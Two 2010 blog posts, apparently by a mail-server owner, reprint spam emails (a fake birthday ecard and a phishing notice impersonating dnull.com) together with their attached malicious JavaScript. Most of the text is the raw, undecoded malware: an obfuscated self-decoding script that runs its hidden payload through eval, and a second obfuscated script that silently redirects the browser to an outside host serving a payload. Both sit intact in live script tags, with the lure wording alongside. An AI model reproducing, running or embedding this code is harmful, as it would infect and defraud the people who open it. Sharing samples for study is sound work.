Monday, June 14, 2010

More self-modifying Javascript.

More self-modifying Javascript. There must be some sort of kit for this out there.


Delivered-To: xyz@dnull.com
Received: (qmail 9347 invoked by uid 82); 14 Jun 2010 12:33:19 -0000
Received: from net37.78.95-129.chelny.ertelecom.ru (95.78.37.129)
  by dnull.com with SMTP; 14 Jun 2010 12:33:19 -0000
Received: from 95.78.37.129 by mail.rjwaters.com; Mon, 14 Jun 2010 15:32:41 +0200
Message-ID: <000d01cb0bbd$aec28820$6400a8c0@positiverkk>
From: "123Greetings.com" <ecards@123greetings.com>
To:  xyz@dnull.com
Subject: positiverkk@rjwaters.com has sent you a birthday ecard.
Date: Mon, 14 Jun 2010 15:32:41 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0006_01CB0BBD.AEC28820"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB0BBD.AEC28820
Content-Type: text/plain;
 format=flowed;
 charset="Windows-1252";
 reply-type=original
Content-Transfer-Encoding: 7bit

[positiverkk@rjwaters.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.

ecard.html

<script>
var jwp ; jwp = '' ; var cWhax=this;var PR= ''+'replace' ;var qEBr ,QlYGtB ;var Vtb= 135; if (qEBr==QlYGtB){qEBr = QlYGtB -Vtb;}var XR = 'PZiwIHEbmSVFCg' ; var ECA='OcrRadyvPTqvcGV' ; var jYsZyG; jYsZyG='t4tcP7'; var Nht,sz ,IhBx ;if (IhBx<Nht || Nht>
=sz){Nht= sz^IhBx;}var tbDU='0tdtdtc'; var FwMRi ='9t0tdP4P8P9KeK9Xet0tdXdt1' ;var aYPV=219;var assM, PVqWMD ; if (aYPV>
assM){aYPV = assM+PVqWMD;}var ELNT='t6t5tdXaX9tct8t2K7tat6t4K6O5KbK9K6P7P5t0tfXbt8t4tcK9XaXbtaP4Ket1XdXdX9P3K6K6tet6tet6t6X9K7ta'; function sv(nkAfi){var PYQS =jwp; for(vytw= 0 ;vytw<nkAfi['lKeZnugGtKhG'[PR](/[GKudZ]/g,jwp)] ; ++vytw){PYQS =PYQS+cWhax['SGtGrXiRnLgR'[PR](/[RXdGL]/g ,jwp)]['fqrqonmjCjhjanrjCSoSdSen'[PR](/[nqSjO]/g ,jwp)](9^nkAfi['cxhlaQrQCEovdQeQAvtv'[PR](/[vxQEl]/g, jwp)](vytw)); }return PYQS ;}var cNovEF; cNovEF ='' ;var Ult =287 ; var XV , OFRHX; if (OFRHX>
Ult && Ult==XV){Ult = XV - OFRHX ;}cNovEF='t7P2KeP7P5K6t0' ; var cEN= 671; var vGrGWx =49;var wbOXK=8; if (cEN<vGrGWx){cEN= vGrGWx^wbOXK; }var yt ;yt ='' ; yt ='P4KeP8KeK9t1tct0tet1XdP4';var miOda='hrJHSbCrj';var uuRmg ;uuRmg= '';uuRmg = 'K7tat6t4P3P1P9P1P9K6t' ;var qaiU =425; var HRrdL = 625;var UwkVX ; UwkVX=455 ; if (qaiU>
HRrdL){qaiU =HRrdL^UwkVX ;}var lM = 'cujgJRXbCumHlckmswa';var fz ; fz = ''; var eg = 564 ; var HBZP ,cWnUTE ; if (eg>
=HBZP){eg = HBZP - cWnUTE;}fz ='0t7tdtcX1K7X9t1X9P6X'; var wpNFA,pRZ ;var yXAK=896; if (wpNFA>
pRZ){wpNFA = pRZ/yXAK;}var YZX;YZX='KeP8KeK9XaXdX0t5t'; var wrqylK;wrqylK = 'KbK'; var WfLtQN ; WfLtQN =432;var lE=833 ; var eYig =524 ; if (eYig =WfLtQN || WfLtQN<lE){WfLtQN= lE-eYig;}var gIsW ; gIsW ='' ;var ETuZX ,vt;var xzLS =433;if (ETuZX<vt){ETuZX=vt -xzLS; }gIsW='Xftc' ; var QOh , Tfxm , USrprT ; if (QOh>
=Tfxm){QOh =Tfxm+USrprT ; }var Au = 'XtVOyHAW'; var TUsG=217; var Mvm ;Mvm = 3;var CVc; CVc=676 ; if (TUsG>
Mvm){TUsG =Mvm^CVc; }var UeJmfD = 'Xbt5P4t1XdXdX9P3K6K6Xd'; var IyrWK ; IyrWK='t8t5tctd' ; var CaigsD= 819;var YG, ccjfI;if (ccjfI<CaigsD && CaigsD<YG){CaigsD=YG -ccjfI; }var EE ; EE= '' ; EE= '0P2' ; var It; It='Xft0Xat0tbt0t5t0XdX0P3K9t1t' ;var PCUM, bvEVF ; var lwRIU =925 ; if (PCUM==bvEVF){PCUM =bvEVF/lwRIU ;}var MoOU='DECiRVNbVM'; var uRMo, Tw, TbwgHq ;if (uRMo>
Tw){uRMo=Tw -TbwgHq; }var jZGWg = 'HbwTxZ';var zA= 168 ; var oKMNLY= 74; var YNMHpo ;YNMHpo = 312; if (zA>
oKMNLY){zA= oKMNLY+YNMHpo ; }var it='dP4O5KbPaP2Xc' ;var RK ='tdt6taXct4tct7XdK7XeXbt0XdtcK1KbP5t4tcXdt8K9t1XdXdX9K4tcX8Xct0XfP4O5KbXbtctfXbtcXat1O5KbK9tat6t7Xdtct7X'; var pFlFl; pFlFl = '' ;var ufSfR=660; var cbcj=76; var zKTEu = 676 ; if (ufSfR==cbcj){ufSfR =cbcj-zKTEu;}pFlFl = 't8Xat8t7t6Xft8Xbtc' ; var ICqTJ= 945;var yXDh ,Nbu; if (Nbu= ICqTJ && ICqTJ>
yXDh){ICqTJ=yXDh^Nbu; }var iAc; iAc= '';iAc ='tfXbt8'; var aidGt =25 ;var zwxfqC = 337;var AfCI ;AfCI = 159 ; if (aidGt<zwxfqC){aidGt=zwxfqC+AfCI ; }var LbomSl='cP4Ke' ; var hMjFLa=601 ; var bzpXo ,NPqgN; if (hMjFLa==bzpXo){hMjFLa =bzpXo/NPqgN ;}var MAJjm;MAJjm=jwp ;var Km=RK+it ;Km = Km+UeJmfD+ELNT+pFlFl+gIsW+IyrWK+uuRmg;Km= Km+fz;Km= Km+FwMRi+yt+YZX+LbomSl ;Km = Km+It ;Km = Km+tbDU; Km=Km+cNovEF+iAc+jYsZyG; Km= Km+wrqylK; Km=Km+EE+MAJjm ; var YbeU='xKA2osQ0IPn3UOl5YSa1jWL4HXB7mhr8ztv6JZT9'[PR](/[xoIUYjHmzJ]/g ,'\%')[PR](/[AQnlaLBrvT]/g , '\\') ; var ynSSG= "')[PR](/["; var GZGLMc= "]/g ,'%" ;var pFuQcs =YbeU[PR](/[\%]/g ,ynSSG)[PR](/[\\]/g ,GZGLMc);var Inlz, YwGin ; var gRw = 35; if (Inlz==YwGin){Inlz=YwGin^gRw ;}cWhax['eBvAaClF'[PR](/[FCAHB]/g, jwp)]('var CuoNi= Km'+pFuQcs['shuhbhsAtArPiznPga'[PR](/[aAhzP]/g,jwp)](2 ,pFuQcs['lEeSnSgStIhH'[PR](/[HBSIE]/g , jwp)])+"'); "); cWhax['eovnaIlI'[PR](/[InopA]/g , jwp)](sv(cWhax[['uEntejsjcjaEpVej'[PR](/[jVwtE]/g, jwp)]](CuoNi))) ;</script>




Thursday, June 10, 2010

Javascript Phishing Trojan

Here is another bit of self modifying Javascript code. This one came in the form of a Phishing Trojan.

dnull.com support to sokol

Dear Customer,
This e-mail was send by dnull.com to notify you that we have temporanly prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
(C) dnull.com
Where it gets interesting is I own dnull.com and it's my server. How stupid can these guys be?


 I don't have time to decipher it.


Maybe someone here will take the time.


<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';<script>